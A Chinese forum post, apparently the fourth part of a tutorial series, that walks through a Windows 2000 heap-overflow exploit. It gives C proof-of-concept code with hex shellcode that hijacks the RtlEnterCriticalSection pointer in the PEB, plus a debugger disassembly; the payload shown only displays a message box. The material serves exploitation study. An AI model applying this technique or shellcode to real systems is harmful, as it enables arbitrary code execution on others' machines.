12558网页游戏私服论坛

 找回密码
 立即注册
游戏开服表 申请开服
游戏名称 游戏描述 开服状态 游戏福利 运营商 游戏链接
攻城掠地-仿官 全新玩法,觉醒武将,觉醒技能 每周新区 经典复古版本,长久稳定 进入游戏
巅峰新版攻 攻城掠地公益服 攻城掠地SF 新兵种、新武将(兵种) 进入游戏
攻城掠地公 散人玩家的天堂 新开 进入游戏
改版攻城掠 上线即可国战PK 稳定新区 全新改版,功能强大 进入游戏
少年江山 高福利高爆率 刚开一秒 江湖水落潜蛟龙 进入游戏
太古封魔录 开服送10亿钻石 福利多多 不用充钱也可升级 进入游戏
神魔之道 签到送元宝 稳定开新区 送豪华签到奖励 进入游戏
神奇三国 统帅三军,招揽名将 免费玩新区 激情国战,征战四方 进入游戏
龙符 三日豪礼领到爽 天天开新区 助你征战无双 进入游戏
王者之师 免费领豪华奖励 免费玩新区 6元送6888元宝 进入游戏
三国霸业 战车-珍宝-觉醒-攻城掠地SF-全新玩法 免费玩新区 攻城掠地私服 进入游戏
手游私服盒子 各类免费游戏 0.1折送海量资源 各类手游私服 进入游戏
皇家MU2 《奇迹 2:传奇》韩国网禅公司《奇迹》正统续作。 3D锁视角Mmrpg 暗黑3+传奇+流放之路+奇迹 进入游戏
查看: 460|回复: 0

windows 2000堆溢出之代码植入(四)

[复制链接]

49

主题

49

帖子

108

积分

实习版主

Rank: 7Rank: 7Rank: 7

积分
108
发表于 2019-8-20 11:29:24 | 显示全部楼层 |阅读模式
1 only run on windows 2000
2 complied with VC 6.0
3 build into release version
[C] 纯文本查看 复制代码/*****************************************************************************      To be the apostrophe which changed "Impossible" into "I'm possible"!             POC code of chapter 6.4 in book "Vulnerability Exploit and Analysis Technique" file name : heap_PEB.cauthor           : failwest date        : 2007.04.04 description     : demo show of heap overrun, shellcode was executed                       function pointer of RtlEnterCriticalSection was changed in PEB                       via DWORD shooting                       Some address may need to reset via run time debugging Noticed          :      1 only run on windows 2000                            2 complied with VC 6.0                            3 build into release version                            4 used for run time debuggingversion          : 1.0E-mail           : failwest@gmail.com                    Only for educational purposes    enjoy the fun from exploiting :)******************************************************************************/ #include  char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";//200 bytes 0x90 main(){       HLOCAL h1 = 0, h2 = 0;       HANDLE hp;       hp = HeapCreate(0,0x1000,0x10000);       h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,200);       __asm int 3 //used to break the process       memcpy(h1,shellcode,200); //normal cpy, used to watch the heap       //memcpy(h1,shellcode,0x200); //overflow,0x200=512       h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);       return 0;}

生成release版本,然后attach

直接来到分配的堆块,然后nop填充掉int3,F8单步走下去,直到0x90覆盖整个堆块

可以看出来,200字节的0x90刚好填充整个堆块,后面跟着的是尾块的块首,接下来就是用溢出来覆盖堆块的两个指针先来看看需要使用的shellcode
[C] 纯文本查看 复制代码#include  char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90"//repaire the pointer which shooted by heap over run"\xB8\x20\xF0\xFD\x7F"  //MOV EAX,7FFDF020"\xBB\x60\x20\xF8\x77"  //MOV EBX,77F8AA4C the address here may releated to your OS"\x89\x18"                           //MOV DWORD PTR DS:[EAX],EBX"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C""\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53""\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B""\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95""\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59""\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A""\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75""\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03""\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB""\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50""\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90""\x16\x01\x1A\x00\x00\x10\x00\x00"// head of the ajacent free block"\x88\x06\x36\x00\x20\xf0\xfd\x7f";//0x00520688 is the address of shellcode in first heap block, you have to make sure this address via debug//0x7ffdf020 is the position in PEB which hold a pointer to RtlEnterCriticalSection()//and will be called by ExitProcess() at last main(){       __asm       {              lea eax,shellcode              push eax              ret       }       return 0;}
生成后载入OD看看长啥样

代码
[Asm] 纯文本查看 复制代码00406030    90              nop00406031    90              nop00406032    90              nop00406033    90              nop00406034    90              nop00406035    90              nop00406036    90              nop00406037    90              nop00406038    90              nop00406039    90              nop0040603A    90              nop0040603B    90              nop0040603C    B8 20F0FD7F     mov     eax, 7FFDF02000406041    BB 6020F877     mov     ebx, ntdll.RtlEnterCriticalSecti>00406046    8918            mov     dword ptr [eax], ebx00406048    FC              cld00406049    68 6A0A381E     push    1E380A6A0040604E    68 6389D14F     push    4FD1896300406053    68 3274910C     push    0C91743200406058    8BF4            mov     esi, esp0040605A    8D7E F4         lea     edi, dword ptr [esi-C]0040605D    33DB            xor     ebx, ebx0040605F    B7 04           mov     bh, 400406061    2BE3            sub     esp, ebx00406063    66:BB 3332      mov     bx, 323300406067    53              push    ebx00406068    68 75736572     push    726573750040606D    54              push    esp0040606E    33D2            xor     edx, edx00406070    64:8B5A 30      mov     ebx, dword ptr fs:[edx+30]00406074    8B4B 0C         mov     ecx, dword ptr [ebx+C]00406077    8B49 1C         mov     ecx, dword ptr [ecx+1C]0040607A    8B09            mov     ecx, dword ptr [ecx]0040607C    8B69 08         mov     ebp, dword ptr [ecx+8]0040607F    AD              lods    dword ptr [esi]00406080    3D 6A0A381E     cmp     eax, 1E380A6A00406085    75 05           jnz     short 0040608C00406087    95              xchg    eax, ebp00406088    FF57 F8         call    dword ptr [edi-8]0040608B    95              xchg    eax, ebp0040608C    60              pushad0040608D    8B45 3C         mov     eax, dword ptr [ebp+3C]00406090    8B4C05 78       mov     ecx, dword ptr [ebp+eax+78]00406094    03CD            add     ecx, ebp00406096    8B59 20         mov     ebx, dword ptr [ecx+20]00406099    03DD            add     ebx, ebp0040609B    33FF            xor     edi, edi0040609D    47              inc     edi0040609E    8B34BB          mov     esi, dword ptr [ebx+edi*4]004060A1    03F5            add     esi, ebp004060A3    99              cdq004060A4    0FBE06          movsx   eax, byte ptr [esi]004060A7    3AC4            cmp     al, ah004060A9    74 08           je      short 004060B3004060AB    C1CA 07         ror     edx, 7004060AE    03D0            add     edx, eax004060B0    46              inc     esi004060B1  ^ EB F1           jmp     short 004060A4004060B3    3B5424 1C       cmp     edx, dword ptr [esp+1C]004060B7  ^ 75 E4           jnz     short 0040609D004060B9    8B59 24         mov     ebx, dword ptr [ecx+24]004060BC    03DD            add     ebx, ebp004060BE    66:8B3C7B       mov     di, word ptr [ebx+edi*2]004060C2    8B59 1C         mov     ebx, dword ptr [ecx+1C]004060C5    03DD            add     ebx, ebp004060C7    032CBB          add     ebp, dword ptr [ebx+edi*4]004060CA    95              xchg    eax, ebp004060CB    5F              pop     edi004060CC    AB              stos    dword ptr es:[edi]004060CD    57              push    edi004060CE    61              popad004060CF    3D 6A0A381E     cmp     eax, 1E380A6A004060D4  ^ 75 A9           jnz     short 0040607F004060D6    33DB            xor     ebx, ebx004060D8    53              push    ebx004060D9    68 77657374     push    74736577004060DE    68 6661696C     push    6C696166004060E3    8BC4            mov     eax, esp004060E5    53              push    ebx004060E6    50              push    eax004060E7    50              push    eax004060E8    53              push    ebx004060E9    FF57 FC         call    dword ptr [edi-4]004060EC    53              push    ebx004060ED    FF57 F8         call    dword ptr [edi-8]004060F0    90              nop004060F1    90              nop004060F2    90              nop004060F3    90              nop004060F4    90              nop004060F5    90              nop004060F6    90              nop004060F7    90              nop
讲一下为什么这样写:ExitProcess()在结束进程时会调用临界区函数RtlEnterCriticalSection()来同步线程,而且这个函数指针在PEB中偏移0x20的位置0x7ffdf020,是的,固定的,但是该函数指针的值在不同的操作系统上不一样,需要先记住,一定要记住,直接Ctrl+G到0x7ffdf020就可以看到这个函数的指针了,那么DWORDSHOOT的目标就有了,咱们把shellcode里尾块的块首先按照自己的堆块信息修改好,不同的操作系统堆区起始位置可能不太一样,需要在shellcode里修改,溢出后,当h2分配的时候,伪造的指针就会进行DWORDSHOOT,将shellcode的起始位置写入临界区函数RtlEnterCriticalSection()的地址,这时候堆溢出就会导致异常,异常了就会调用ExitProcess()函数结束线程,是的,没有错,会取出临界区函数RtlEnterCriticalSection()的指针,这个指针的值已经被我们shellcode的起始位置覆盖了,所以就回去执行shellcode,然而!!!!!!刚刚我说:记住临界区函数RtlEnterCriticalSection()的指针的值,为什么?因为shellcode也会调用临界区函数RtlEnterCriticalSection(),但是这时候取出的值又是shellcode的值,这咋整?所以刚刚记住的真实地址就有用了,咱们的shellcode前面不是一堆0x90嘛,在那里修复一下临界区函数RtlEnterCriticalSection()函数指针的值,然后继续执行shellcode完整的代码[C] 纯文本查看 复制代码/*****************************************************************************      To be the apostrophe which changed "Impossible" into "I'm possible"!             POC code of chapter 6.4 in book "Vulnerability Exploit and Analysis Technique" file name : heap_PEB.cauthor           : failwest date        : 2007.04.04 description     : demo show of heap overrun, shellcode was executed                       function pointer of RtlEnterCriticalSection was changed in PEB                       via DWORD shooting                       Some address may need to reset via run time debugging Noticed          :      1 only run on windows 2000                            2 complied with VC 6.0                            3 build into release version                            4 used for run time debuggingversion          : 1.0E-mail           : failwest@gmail.com                    Only for educational purposes    enjoy the fun from exploiting :)******************************************************************************/ #include  char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90"//repaire the pointer which shooted by heap over run"\xB8\x20\xF0\xFD\x7F"  //MOV EAX,7FFDF020"\xBB\x60\x20\xF8\x77"  //MOV EBX,77F8AA4C the address here may releated to your OS"\x89\x18"                           //MOV DWORD PTR DS:[EAX],EBX"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C""\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53""\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B""\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95""\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59""\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A""\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75""\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03""\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB""\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50""\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90""\x16\x01\x1A\x00\x00\x10\x00\x00"// head of the ajacent free block"\x88\x06\x36\x00\x20\xf0\xfd\x7f";//0x00520688 is the address of shellcode in first heap block, you have to make sure this address via debug//0x7ffdf020 is the position in PEB which hold a pointer to RtlEnterCriticalSection()//and will be called by ExitProcess() at last  main(){       HLOCAL h1 = 0, h2 = 0;       HANDLE hp;       hp = HeapCreate(0,0x1000,0x10000);       h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,200);       //__asm int 3 //used to break the process       //memcpy(h1,shellcode,200); //normal cpy, used to watch the heap       memcpy(h1,shellcode,0x200); //overflow,0x200=512       h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);       return 0;}生成release,运行

windows 2000堆溢出之空表(一)
windows 2000堆溢出之快表(二)
windows 2000堆溢出之DWORDSHOOT(三)
windows 2000堆溢出之代码植入(四)


来源:http://www.12558.net
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
楼主热帖
回复

使用道具 举报

*滑块验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|12558网页游戏私服论坛 |网站地图

GMT+8, 2025-1-19 07:49 , Processed in 0.078125 second(s), 31 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表